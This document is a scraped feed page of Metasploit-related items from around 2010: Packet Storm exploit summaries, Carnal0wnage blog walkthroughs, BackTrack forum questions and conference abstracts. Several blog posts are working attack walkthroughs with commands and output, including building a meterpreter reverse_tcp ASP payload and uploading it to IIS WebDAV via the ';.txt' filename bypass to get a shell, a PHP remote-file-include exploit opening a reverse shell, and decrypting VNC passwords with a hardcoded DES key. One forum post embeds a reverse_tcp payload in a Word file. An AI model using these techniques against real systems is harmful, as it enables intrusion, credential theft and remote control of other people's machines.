This Metasploit module exploits a vulnerability in the Golden FTP service. This Metasploit module uses the PASS command to trigger the overflow.
-
-
21:52
»
Packet Storm Security Exploits
This Metasploit module exploits a vulnerability found in VisiWave's Site Survey Report application. When processing .VWR files, VisiWave.exe attempts to match a valid pointer based on the 'Type' property (valid ones include 'Properties', 'TitlePage', 'Details', 'Graph', 'Table', 'Text', 'Image'), but if a match isn't found, the function that's supposed to handle this routine ends up returning the input as a pointer, and later used in a CALL DWORD PTR [EDX+10] instruction. This allows attackers to overwrite it with any arbitrary value, and results code execution. This Metasploit module was built to bypass ASLR and DEP. NOTE: During installation, the application will register two file handle's, VWS and VWR and allows a victim user to 'double click' the malicious VWR file and execute code.
-
21:52
»
Packet Storm Security Recent Files
This Metasploit module exploits a vulnerability found in VisiWave's Site Survey Report application. When processing .VWR files, VisiWave.exe attempts to match a valid pointer based on the 'Type' property (valid ones include 'Properties', 'TitlePage', 'Details', 'Graph', 'Table', 'Text', 'Image'), but if a match isn't found, the function that's supposed to handle this routine ends up returning the input as a pointer, and later used in a CALL DWORD PTR [EDX+10] instruction. This allows attackers to overwrite it with any arbitrary value, and results code execution. This Metasploit module was built to bypass ASLR and DEP. NOTE: During installation, the application will register two file handle's, VWS and VWR and allows a victim user to 'double click' the malicious VWR file and execute code.
-
21:52
»
Packet Storm Security Misc. Files
This Metasploit module exploits a vulnerability found in VisiWave's Site Survey Report application. When processing .VWR files, VisiWave.exe attempts to match a valid pointer based on the 'Type' property (valid ones include 'Properties', 'TitlePage', 'Details', 'Graph', 'Table', 'Text', 'Image'), but if a match isn't found, the function that's supposed to handle this routine ends up returning the input as a pointer, and later used in a CALL DWORD PTR [EDX+10] instruction. This allows attackers to overwrite it with any arbitrary value, and results code execution. This Metasploit module was built to bypass ASLR and DEP. NOTE: During installation, the application will register two file handle's, VWS and VWR and allows a victim user to 'double click' the malicious VWR file and execute code.
-
-
13:36
»
Packet Storm Security Recent Files
USBsploit is a proof of concept that will generate Reverse TCP backdoors (x86, x64, all ports) and malicious LNK files. USBsploit works through Meterpreter sessions with a light (27MB) modified version of Metasploit. The interface is a mod of SET. The Meterscript script usbsploit.rb of the USBsploit Framework can otherwise be used with the original Metasploit Framework.
-
13:36
»
Packet Storm Security Tools
USBsploit is a proof of concept that will generate Reverse TCP backdoors (x86, x64, all ports) and malicious LNK files. USBsploit works through Meterpreter sessions with a light (27MB) modified version of Metasploit. The interface is a mod of SET. The Meterscript script usbsploit.rb of the USBsploit Framework can otherwise be used with the original Metasploit Framework.
-
13:36
»
Packet Storm Security Misc. Files
USBsploit is a proof of concept that will generate Reverse TCP backdoors (x86, x64, all ports) and malicious LNK files. USBsploit works through Meterpreter sessions with a light (27MB) modified version of Metasploit. The interface is a mod of SET. The Meterscript script usbsploit.rb of the USBsploit Framework can otherwise be used with the original Metasploit Framework.
-
-
19:32
»
Carnal0wnage
inside your meterpreter shell run getvncpw
meterpreter > run getvncpw
[*] Searching for VNC Passwords in the registry....
[*] FOUND in HKLM\Software\RealVNC\WinVNC4 -=> 3290e903b5bf3769 =>
you're probably asking yourself what the F kind of password 3290e... is. Well its DES encrypted. Lucky for us the key is hardcoded (0x238210763578887) and since VNC is open source...
code here:
http://packetstormsecurity.org/files/view/10159/vncdec.
change the relevant section
/* put your password hash here in p[] */
char p[]={0x59,0x58,0x6e,0x10,0xa4,0x48,0xd3,0x80};
getvncpw spit out: 3290e903b5bf3769
char p[]={0x32,0x90,0xe9,0x03,0xb5,0xbf,0x37,0x69};
cg@segfault:~/pentest$ gcc vncdec.c -o vncdec
cg@segfault:~/pentest$ ./vncdec
demopass
or use this one
http://www.consume.org/~jshare/vncdec.c
where you can just put your hash on the command line and don't have to recompile every time.
-
-
9:59
»
Packet Storm Security Recent Files
The Metasploit Framework is an advanced open-source platform for developing, testing, and using exploit code. Metasploit is used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide. The framework is written in the Ruby programming language and includes components written in C and assembler.
-
9:59
»
Packet Storm Security Tools
The Metasploit Framework is an advanced open-source platform for developing, testing, and using exploit code. Metasploit is used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide. The framework is written in the Ruby programming language and includes components written in C and assembler.
-
9:59
»
Packet Storm Security Misc. Files
The Metasploit Framework is an advanced open-source platform for developing, testing, and using exploit code. Metasploit is used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide. The framework is written in the Ruby programming language and includes components written in C and assembler.
-
-
13:25
»
SecDocs
Authors:
Max Moser Philipp Schrödel Tags:
web application web Metasploit Event:
Hashdays 2010 Abstract: The talk introduces our new open source extension for the well known Metasploit Framework, called CARAT. It uses Metasploits Meterpreter technology to communicate in between the client (to be scanned target) and the server (The Metasploit Server running the CARAT plugin), execute commands and consolidate the results. By introducing client specific job scheduling to Metasploit, CARAT is a Framework for automated configuration validation, security assessments and functional testing of components and applications. In contrary to a lot of other available frameworks, CARATs architecture is as simple as possible, this allows a great amount of flexibility to its users.
-
-
12:24
»
Carnal0wnage
You probably missed it but jduck recently snuck in a VNC mixin and vnc_login module to the trunk.
This is awesome because before that I had to use Immunity's
VAAseline to do VNC bruteforcing. But now you can just use vnc_login.
So the scenario is you find yourself on the other end of a VNC server.
Its tedious to password guess like this
Instead let's use the metasploit module
and throw a dictionary attack against the VNC server
Looks like the VNC no auth module had been ported and stuck in there too :-)
-CG
-
-
9:11
»
Packet Storm Security Recent Files
USBsploit is a proof of concept that will generate Reverse TCP backdoors (x86, x64, all ports) and malicious LNK files. USBsploit works through Meterpreter sessions with a light (27MB) modified version of Metasploit. The interface is a mod of SET. The Meterscript script usbsploit.rb of the USBsploit Framework can otherwise be used with the original Metasploit Framework.
-
9:11
»
Packet Storm Security Tools
USBsploit is a proof of concept that will generate Reverse TCP backdoors (x86, x64, all ports) and malicious LNK files. USBsploit works through Meterpreter sessions with a light (27MB) modified version of Metasploit. The interface is a mod of SET. The Meterscript script usbsploit.rb of the USBsploit Framework can otherwise be used with the original Metasploit Framework.
-
9:11
»
Packet Storm Security Misc. Files
USBsploit is a proof of concept that will generate Reverse TCP backdoors (x86, x64, all ports) and malicious LNK files. USBsploit works through Meterpreter sessions with a light (27MB) modified version of Metasploit. The interface is a mod of SET. The Meterscript script usbsploit.rb of the USBsploit Framework can otherwise be used with the original Metasploit Framework.
-
-
17:44
»
Packet Storm Security Exploits
The TFTPUtil GUI server version 1.4.5 can be denial of serviced by sending a specially crafted read request. Depending on the setup, sending write request "\x00\x02" may also work. This is written as a Metasploit module.
-
17:44
»
Packet Storm Security Recent Files
The TFTPUtil GUI server version 1.4.5 can be denial of serviced by sending a specially crafted read request. Depending on the setup, sending write request "\x00\x02" may also work. This is written as a Metasploit module.
-
17:44
»
Packet Storm Security Misc. Files
The TFTPUtil GUI server version 1.4.5 can be denial of serviced by sending a specially crafted read request. Depending on the setup, sending write request "\x00\x02" may also work. This is written as a Metasploit module.
-
-
18:10
»
Packet Storm Security Exploits
This Metasploit module logs in to an Axis2 Web Admin Module instance using a specific user/pass and uploads and executes commands via deploying a malicious web service by using REST.
-
18:10
»
Packet Storm Security Recent Files
This Metasploit module logs in to an Axis2 Web Admin Module instance using a specific user/pass and uploads and executes commands via deploying a malicious web service by using REST.
-
18:10
»
Packet Storm Security Misc. Files
This Metasploit module logs in to an Axis2 Web Admin Module instance using a specific user/pass and uploads and executes commands via deploying a malicious web service by using REST.
-
-
9:29
»
Packet Storm Security Exploits
This Metasploit module logins to an Axis2 Web Admin Module instance using a specific user/pass and uploads and executes commands via deploying a malicious web service by using SOAP.
-
9:29
»
Packet Storm Security Recent Files
This Metasploit module logins to an Axis2 Web Admin Module instance using a specific user/pass and uploads and executes commands via deploying a malicious web service by using SOAP.
-
9:29
»
Packet Storm Security Misc. Files
This Metasploit module logins to an Axis2 Web Admin Module instance using a specific user/pass and uploads and executes commands via deploying a malicious web service by using SOAP.
-
-
22:17
»
Packet Storm Security Exploits
This Metasploit module exploits a stack overflow in the LDAP service that is part of the NAI PGP Enterprise product suite. This Metasploit module was tested against PGP KeyServer v7.0. Due to space restrictions, egghunter is used to find our payload - therefore you may wish to adjust WfsDelay.
-
-
1:01
»
Packet Storm Security Tools
USBsploit is a proof of concept that will generate Reverse TCP backdoors (x86, x64, all ports) and malicious LNK files. USBsploit works through Meterpreter sessions with a light (27MB) modified version of Metasploit. The interface is a mod of SET. The Meterscript script usbsploit.rb of the USBsploit Framework can otherwise be used with the original Metasploit Framework.
-
-
23:28
»
Packet Storm Security Tools
USBsploit is a proof of concept that will generate Reverse TCP backdoors (x86, x64, all ports) and malicious LNK files. USBsploit works through Meterpreter sessions with a light (27MB) modified version of Metasploit. The interface is a mod of SET. The Meterscript script usbsploit.rb of the USBsploit Framework can otherwise be used with the original Metasploit Framework.
-
-
22:01
»
Packet Storm Security Tools
USBsploit is a proof of concept that will generate Reverse TCP backdoors (x86, x64, all ports) and malicious LNK files. USBsploit works through Meterpreter sessions with a light (27MB) modified version of Metasploit. The interface is a mod of SET. The Meterscript script usbsploit.rb of the USBsploit Framework can otherwise be used with the original Metasploit Framework.
-
20:45
»
Packet Storm Security Tools
USBsploit is a proof of concept that will generate Reverse TCP backdoors (x86, x64, all ports) and malicious LNK files. USBsploit works through Meterpreter sessions with a light (27MB) modified version of Metasploit. The interface is a mod of SET. The Meterscript script usbsploit.rb of the USBsploit Framework can otherwise be used with the original Metasploit Framework.
-
16:07
»
Packet Storm Security Recent Files
Whitepaper called Creating Windows Exploits with the Metasploit Framework, or Criar Exploits Para o Windows com a Ajuda da Metasploit Framework. Written in Portuguese.
-
-
19:41
»
remote-exploit & backtrack
Hi everyone, I feel like a bit of a goose regarding this issue but after searching and searching I still can't find my answer so I was hoping someone could shed some light on this for me.
The problem I am having is that when I try to output an nmap scan using metasploit for example:
msf> db_nmap -v -sV 192.168.238.100 -oA /home/output
I only get the grepable output and not the other major outputs, if I specify that I want xml output it wont produce any output at all.
However if I am using nmap as a standalone application all the output options and formats work as they should.
I'm running Backtrack 4 R1, with Metaspolit 3.4.2-dev and nmap 5.35DC1.
-
-
16:47
»
Carnal0wnage
Grabbing the index pages of web servers seems like a no brainer and something every pentester is going to perform on a test. The problem I ran into is how do you get this info once your inside and using meterpreter as your pivot into the network.
Your current options are to port forward to each host or set up a route via your meterpreter session and run some sort of auxiliary module. You can tcp port scan and find open ports or use the http_version module to see server version but you don't get a feel for whats actually on the site.
I opted to write something that would scan a range, perform a HTTP GET of / on the ip, then take the resulting body from the response, which should be html, and save it to a file to look at afterwards.
Looks like this when it runs...
msf auxiliary(http_index_grabber) > set RHOSTS carnal0wnage.com/24
RHOSTS => carnal0wnage.com/24
msf auxiliary(http_index_grabber) > run
[+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/209.20.85.4_20100904.4426.html
[+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/209.20.85.5_20100904.4429.html
[*] Received 301 to http://drumsti.cc/ for 209.20.85.10:80/
[-] Received 403 for 209.20.85.8:80/
[+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/209.20.85.12_20100904.4432.html
...
[*] Received 302 to http://209.20.85.57/apache2-default/ for 209.20.85.57:80/ [+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/209.20.85.56_20100904.4503.html
[*] Received 302 to http://209.20.85.51/session/new for 209.20.85.51:80/
you can then check out the folder with the results
code is here:
http://carnal0wnage.googlecode.com/svn/trunk/msf3/modules/auxiliary/admin/random/http_index_grabber.rb
-
-
16:01
»
Packet Storm Security Recent Files
This Metasploit module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious DLL. This Metasploit module creates a WebDAV service that can be used to run an arbitrary payload when accessed as a UNC path.
-
16:01
»
Packet Storm Security Exploits
This Metasploit module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious DLL. This Metasploit module creates a WebDAV service that can be used to run an arbitrary payload when accessed as a UNC path.
-
-
10:41
»
remote-exploit & backtrack
Hallo ich bafasse mich seit kurzem mit metasploit. Habe dazu mein Ubuntu Linux mit metasploit ausgestattet und in einer VM ein Windows Home XP SP2. Habe dazu mit msfpayload ein file erstellt:
Code:
./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.178.50 V > /tmp/testfile.bas
dieses file versuche ich dann in das Wordfile zu integrieren, doch sobald ich mit dem importierten Code speicher will bekomme ich immer die Meldung, dass ich zu wenig speicher hätte.
Hat jemand eine Idee woran das liegen könnte? Danke schon mal für die Hilfe.
Danke schon mal
-
-
6:46
»
remote-exploit & backtrack
Hi,
ich habe BackTrack 4 in einer VM laufen. Wollte mich mal ein wenig mit Metasploit befassen, doch beim updaten triff immer ein Fehler auf:
Code:
root@bt:/pentest/exploits/exploitdb# msfupdate
Updating Metasploit from metasploit.com/svn/framework3/trunk...
svn: Working copy '.' locked
svn: run 'svn cleanup' to remove locks (type 'svn help cleanup' for details)
Error: cleaning up the SVN directory and retrying...
svn: In directory '.'
svn: Error processing command 'modify-wcprop' in '.'
svn: 'HACKING' is not under version control
svn: Working copy '.' locked
svn: run 'svn cleanup' to remove locks (type 'svn help cleanup' for details)
Error: please check connectivity to the following URL:
metasploit.com/svn/framework3/trunk
root@bt:/pentest/exploits/exploitdb#
Hat jemand eine Idee was das sein kann? Internet verbindung besteht aber.
Danke schon mal
-
-
8:50
»
remote-exploit & backtrack
hi all,
=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 569 exploits - 285 auxiliary
+ -- --=[ 212 payloads - 27 encoders - 8 nops
=[ svn r9903 updated today (2010.07.21)
my bt 4 final new metasploit java GUI [Exploits,Auxillary,Payload (Menu) not working please help me ..........
thks for all
-
-
22:02
»
Packet Storm Security Exploits
USBsploit is a proof of concept for dumping files from remote USB drives on multiple targets at the same time. It works through Meterpreter sessions with a light (24MB) modified version of Metasploit. The interface is a modified version of SET. usbsploit.rb can also be used with the original Metasploit Framework.
-
-
20:46
»
Packet Storm Security Tools
The Metasploit Framework is an advanced open-source platform for developing, testing, and using exploit code. Metasploit is used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide. The framework is written in the Ruby programming language and includes components written in C and assembler.
-
-
10:41
»
SecDocs
Authors:
Christian Papathanasiou Tags:
web server exploiting JBoss Event:
Black Hat EU 2010 Abstract: JBoss Application Server is the open source implementation of the Java EE suite of services. It's easy-to-use server architecture and high flexibility makes JBoss the ideal choice for users just starting out with J2EE, as well as senior architects looking for a customizable middleware platform. The pervasiveness of JBoss in enterprise JSP deployments is second to none meaning there is an abundance of targets both for the blackhat or the pentester alike. JBoss is usually invoked as root/SYSTEM meaning that any potential exploitation usually results in immediate super user privileges. A tool has been developed that is able to compromise an unprotected JBoss instance. The current state of the art in published literature involves having the JBoss instance connect back to the attacker to obtain a war file that is subsequently deployed. The tool that will be presented at Black Hat does this in-situ and ultimately uploads a Metasploit payload resulting in interactive command execution on the JBoss instance. On Windows platforms, through the Metasploit framework a fully interactive reverse VNC shell can also be obtained and shall be demonstrated. Depending on the platform that has been exploited and the level of access obtained, the tool is able to deploy the Metasploit payload as a persistent backdoor in conjunction with the Metasploit framework’s antivirus evasion techniques. Due to the cross platform nature of the Java language, we are able to compromise JBoss instances running on Linux, MacOSX and Windows.
-
-
2:43
»
Packet Storm Security Recent Files
This Metasploit module uses exploits a malicious backdoor that was added to the Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.
-
2:43
»
Packet Storm Security Exploits
This Metasploit module uses exploits a malicious backdoor that was added to the Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.
-
-
22:48
»
remote-exploit & backtrack
Quote:
msf > db_create
[-]
[-] Warning: The db_create command is deprecated, use db_connect instead.
[-] The database and schema will be created automatically by
[-] db_connect. If db_connect fails to create the database, create
[-] it manually with your DBMS's administration tools.
[-][*] Usage: db_create <user:pass>@<host:port>/<database>[*] Examples:[*] db_create user@metasploit3[*] db_create user:pass@192.168.0.2/metasploit3[*] db_create user:pass@192.168.0.2:1500/metasploit3
|
I got this error ,please give any idea to fix it,thanks
-
-
21:00
»
Packet Storm Security Tools
The Metasploit Framework is an advanced open-source platform for developing, testing, and using exploit code. Metasploit is used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide. The framework is written in the Ruby programming language and includes components written in C and assembler.
-
4:20
»
SecDocs
Authors:
H.D. Moore Tags:
Metasploit Event:
Black Hat DC 2010 Abstract: In 2008 Metasploit expanded from a community-run project to a corporate product managed by Rapid7. This talk focuses on the transition, the lessons learned during the acquisition process, the challenges of maintaining a community, and the latest improvements to the Metasploit Framework. The points covered in this talk are valuable for anyone building an open-source product, contemplating the purchase of one, or considering using an open source product to build a commercial application.
-
-
2:07
»
SecDocs
Authors:
Mike Kershaw Tags:
wireless Metasploit WiFi Event:
Black Hat DC 2010 Abstract: We've figured out how to defend wireless access points, but clients remain exposed. A look at new attacks against clients using old methods we'd all forgotten about and new methods leveraging Metasploit. This talk will include pre-owning clients before vpn authentication, new ways of using gifars, crossdomain.xml attacks and more.
-
2:07
»
SecDocs
Authors:
Mike Kershaw Tags:
wireless Metasploit WiFi Event:
Black Hat DC 2010 Abstract: We've figured out how to defend wireless access points, but clients remain exposed. A look at new attacks against clients using old methods we'd all forgotten about and new methods leveraging Metasploit. This talk will include pre-owning clients before vpn authentication, new ways of using gifars, crossdomain.xml attacks and more.
-
-
21:04
»
SecDocs
Authors:
James Lee Tags:
Metasploit Event:
Black Hat DC 2010 Abstract: Sometimes you need to choose your exploits precisely and be careful about the packets you write to the wire. Sometimes you just want to type a command, go get some coffee, and come back to a pile of shells. This talk will cover the means that the Metasploit Framework provides for accomplishing both of these goals, including many advancements from my talk at Black Hat USA in the realm of client-side exploitation.
-
-
19:19
»
Carnal0wnage
Metasploit has a nifty PHP Remote File Include module that allows you to get a command shell from a RFI.
Not too complicated to use, set your normal RHOST/RPORT options, set the PATH and set your PHPURI with the vuln path and put XXpathXX where you would normally your php shell. So we take something like
Simple Text-File Login Remote File Include that has a vulnerable string of:
/[path]/slogin_lib.inc.php?slogin_path=[remote_txt_shell]
and make your PHPURI
PHPURI /slogin_lib.inc.php?slogin_path=XXpathXX
let's see it in action
msf > search php_include
[*] Searching loaded modules for pattern 'php_include'...
Exploits
========
Name Rank Description
---- ---- -----------
unix/webapp/php_include excellent PHP Remote File Include Generic Exploit
msf > use exploit/unix/webapp/php_include
msf exploit(php_include) > info
Name: PHP Remote File Include Generic Exploit
Version: 8762
Platform: PHP
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Provided by:
hdm
egypt
Available targets:
Id Name
-- ----
0 Automatic
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PATH / yes The base directory to prepend to the URL to try
PHPRFIDB /home/cg/evil/msf3/dev2/data/exploits/php/rfi-locations.dat no A local file containing a list of URLs to try, with XXpathXX replacing the URL
PHPURI no The URI to request, with the include parameter changed to XXpathXX
Proxies no Use a proxy chain
RHOST yes The target address
RPORT 80 yes The target port
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload information:
Space: 32768
Description:
This module can be used to exploit any generic PHP file include
vulnerability, where the application includes code like the
following:
msf exploit(php_include) > set PHPURI /slogin_lib.inc.php?slogin_path=XXpathXX
PHPURI => /slogin_lib.inc.php?slogin_path=XXpathXX
msf exploit(php_include) > set PATH /1/
PATH => /1/
msf exploit(php_include) > set RHOST 192.168.6.68
RHOST => 192.168.6.68
msf exploit(php_include) > set RPORT 8899
RPORT => 8899
msf exploit(php_include) > set PAYLOAD php/reverse_php
PAYLOAD => php/reverse_php
msf exploit(php_include) > set LHOST 192.168.6.140
LHOST => 192.168.6.140
msf exploit(php_include) > exploit
[*] Started bind handler
[*] Using URL: http://192.168.6.140:8080/RvSIqhdft
[*] PHP include server started.
[*] Sending /1/slogin_lib.inc.php?slogin_path=%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%36%2e%31%34%30%3a%38%30
%38%30%2f%52%76%53%49%71%68%64%66%74%3f
[*] Command shell session 1 opened (192.168.6.140:34117 -> 192.168.6.68:8899) at Sun May 09 21:37:26 -0400 2010
dir
0.jpeg header.inc.php license.txt slog_users.txt version.txt
1.jpeg index.asp old slogin.inc.php
adminlog.php install.txt readme.txt slogin_genpass.php
footer.inc.php launch.asp slog_users.php slogin_lib.inc.php
id uid=33(www-data) gid=33(www-data) groups=33(www-data)
-
-
10:01
»
Packet Storm Security Recent Files
This exploits a stack buffer overflow in the AgentX++ library, as used by various applications. By sending a specially crafted request, an attacker can execute arbitrary code, potentially with SYSTEM privileges. This Metasploit module was tested successfully against master.exe as included with Real Network\\'s Helix Server v12. When installed as a service with Helix Server, the service runs as SYSTEM, has no recovery action, but will start automatically on boot. This Metasploit module does not work with NX/XD enabled but could be modified easily to do so. The address
-
10:00
»
Packet Storm Security Exploits
This exploits a stack buffer overflow in the AgentX++ library, as used by various applications. By sending a specially crafted request, an attacker can execute arbitrary code, potentially with SYSTEM privileges. This Metasploit module was tested successfully against master.exe as included with Real Network\\'s Helix Server v12. When installed as a service with Helix Server, the service runs as SYSTEM, has no recovery action, but will start automatically on boot. This Metasploit module does not work with NX/XD enabled but could be modified easily to do so. The address
-
-
7:20
»
Carnal0wnage
intro..webdav stuff...lazy...
To get yourself a test environment you can follow
this tutorial, its not bad. You'll want to make sure you pay attention to the part about allowing your IUSR_WHATEVER account to have have write access or you can set up a windows account to use authentication.
metasploit has a few modules to test for webDAV presence.
webdav_scanner:
msf auxiliary(webdav_scanner) > run
[*] 192.168.242.134 (Microsoft-IIS/6.0) has WEBDAV ENABLED
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
webdav_internal_ip
msf auxiliary(webdav_internal_ip) > run
[*] Found internal IP in WebDAV response (192.168.242.134) 192.168.242.134
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
webdav_website_content
msf auxiliary(webdav_website_content) > run
[*] Found file or directory in WebDAV response (192.168.242.134) http://192.168.242.134/
[*] Found file or directory in WebDAV response (192.168.242.134) http://192.168.242.134/iisstart.htm
[*] Found file or directory in WebDAV response (192.168.242.134) http://192.168.242.134/pagerror.gif
[*] Found file or directory in WebDAV response (192.168.242.134) http://domino/davaroo/
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
The important one there is the davaroo directory if someone has shared out the root directory it will usually just look like this:
[*] Found file or directory in WebDAV response (192.168.242.134) http://192.168.242.134/
Or if you have the path wrong
msf auxiliary(webdav_test) > run
[*] 192.168.242.134/DAV/ has DAV DISABLED
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
If we need to see what options are allowed, you can use the http options auxiliary module.
msf auxiliary(options) > run
[*] 192.168.242.134 allows OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK methods
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
to see if you can upload things quickly you can give DAVtest a try or Ryan Linn's webdav_test module.
msf auxiliary(webdav_test) > run
[*] 192.168.242.134/davaroo/ has DAV ENABLED
[*] Attempting to create /davaroo/WebDavTest_111vO5Ats7
[*] 192.168.242.134/davaroo/ is WRITEABLE
[*] Trying /davaroo/WebDavTest_111vO5Ats7/9RiwStjSE7bI4dv.html
[*] Trying /davaroo/WebDavTest_111vO5Ats7/pd84WuxboP6ZvcN.jhtml
[*] Trying /davaroo/WebDavTest_111vO5Ats7/Lqy4HqgiNoqS9YQ.php
[*] Trying /davaroo/WebDavTest_111vO5Ats7/y2QL82GmZvFHv0U.txt
[*] Trying /davaroo/WebDavTest_111vO5Ats7/W2CNVzATLpt9XeU.cgi
[*] Trying /davaroo/WebDavTest_111vO5Ats7/acl1gOJlmSu5fXf.pl
[*] Trying /davaroo/WebDavTest_111vO5Ats7/pKR4pLVcDpcPCnB.jsp
[*] Trying /davaroo/WebDavTest_111vO5Ats7/KWj69GgzXIHrR0j.aspx
[*] Trying /davaroo/WebDavTest_111vO5Ats7/1ImlpmATPINV2Zj.asp
[*] Trying /davaroo/WebDavTest_111vO5Ats7/OT0B3cOEFLgnIGB.shtml
[*] Trying /davaroo/WebDavTest_111vO5Ats7/yGSr7GVoEmjcQCf.cfm
[*] Attempting to cleanup /davaroo/WebDavTest_111vO5Ats7
[*] Uploadable files are: html,jhtml,php,txt,cgi,pl,jsp,aspx,cfm
[*] Executable files are: html,txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
What you'll probably run into here is the INABILITY to upload executable content or anything otherwise useful on the box. in this case i can upload php, cgi, jsp, aspx, but nothing is there to execute any of that content.
If you try to upload an .asp you'll get a 403 forbidden or if you try to COPY/MOVE a .txt to .asp you'll get a forbidden. :-(
Thankfully there is a "feature" of 2k3 that allows you to upload evil.asp;.txt and that will bypass the filter.
So we generate out evil.asp file using msfpayload and msfencode, you could also use any other asp shell too...
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.6.94 LPORT=443 R |
./msfencode -o tcp443meterp.asp
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)
upload it and rename it
dav:/davaroo/> put tcp443meterp.asp tcp443meterp.txt
Uploading tcp443meterp.asp to `/davaroo/tcp443meterp.txt':
Progress: [=============================>] 100.0% of 314810 bytes succeeded.
dav:/davaroo/> copy tcp443meterp.txt tcp443meterp.asp;.txt
Copying `/davaroo/tcp443meterp.txt' to `/davaroo/tcp443meterp.asp%3b.txt': succeeded.
dav:/davaroo/> exit
now you can browse to the page at ip/tcp443meterp.asp;.txt and get your shell
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.6.94:443
[*] Starting the payload handler...
[*] Sending stage (748032 bytes) to 192.168.6.94
[*] Meterpreter session 1 opened (192.168.6.94:443 -> 192.168.242.134:49306)
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
[-] stdapi_sys_config_getuid: Operation failed: 6
meterpreter > sysinfo
Computer: WebDAVRulez
OS : Windows .NET Server (Build 3790, Service Pack 2).
Arch : x86
Language: en_US
meterpreter > run migrate -f notepad.exe
[*] Current server process: svchost.exe (1792)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 312
[*] New server process: notepad.exe (312)
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
What I ran into was that your shell came back with a less than desirable privilege (Network Service). You'll have to work the local angle to elevate but at least you have a shell.
more info here:
http://blog.metasploit.com/2009/12/exploiting-microsoft-iis-with.htmlResources:
cadaver:
http://www.webdav.org/cadaver/DAVtest:
http://security.sunera.com/2010/04/davtest-quickly-test-exploit-webdav.htmlRyan Linn's port of DAVtest to metasploit:
http://trac.happypacket.net/browser/msfmods/trunk/modules/auxiliary/scanner/http/webdav_test.rb
-
-
16:33
»
Packet Storm Security Recent Files
This Metasploit module exploits a buffer overflow in Serenity AudioPlayer versions 3.2.3 and below. By creating a specially crafted m3u file, an attacker may be able to execute arbitrary code.
-
16:33
»
Packet Storm Security Exploits
This Metasploit module exploits a buffer overflow in Serenity AudioPlayer versions 3.2.3 and below. By creating a specially crafted m3u file, an attacker may be able to execute arbitrary code.
-
0:00
»
Packet Storm Security Exploits
This Metasploit module exploits a stack overflow in WM Downloader version 3.0.0.9. By creating a specially crafted .pls file, an attacker may be able to execute arbitrary code.
-
-
19:12
»
Carnal0wnage
@hdmoore released a
new auxiliary module a few days ago that went along with his NTP research he has been doing.
msf auxiliary(ntp_monlist) > set RHOSTS time.euro.apple.com
RHOSTS => time.euro.apple.com
msf auxiliary(ntp_monlist) > info
Name: NTP Monitor List Scanner
Version: 8432
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
hdm
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
BATCHSIZE 256 yes The number of hosts to probe in each set
CHOST no The local client address
RHOSTS time.euro.apple.com yes The target address range or CIDR identifier
RPORT 123 yes The target port
THREADS 1 yes The number of concurrent threads
Description:
Obtain the list of recent clients from an NTP server
msf auxiliary(ntp_monlist) >
And when you run the module, it looks a bit like this:
msf auxiliary(ntp_monlist) > run
[*] Sending probes to 17.72.255.11->17.72.255.11 (1 hosts)
[*] 17.72.255.11:123 86.138.33.93:56042 (17.72.255.11)
[*] 17.72.255.11:123 188.192.151.225:52210 (17.72.255.11)
[*] 17.72.255.11:123 81.167.222.18:36866 (17.72.255.11)
[*] 17.72.255.11:123 89.247.73.227:63929 (17.72.255.11)
[*] 17.72.255.11:123 80.39.165.55:123 (17.72.255.11)
[*] 17.72.255.11:123 82.19.218.58:123 (17.72.255.11)
[*] 17.72.255.11:123 82.123.121.154:123 (17.72.255.11)
[*] 17.72.255.11:123 90.207.190.29:123 (17.72.255.11)
[*] 17.72.255.11:123 193.52.24.125:38377 (17.72.255.11)
[*] 17.72.255.11:123 91.10.239.87:64361 (17.72.255.11)
--SNIP--
[*] 17.72.255.11:123 89.241.98.89:27213 (17.72.255.11)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ntp_monlist) >
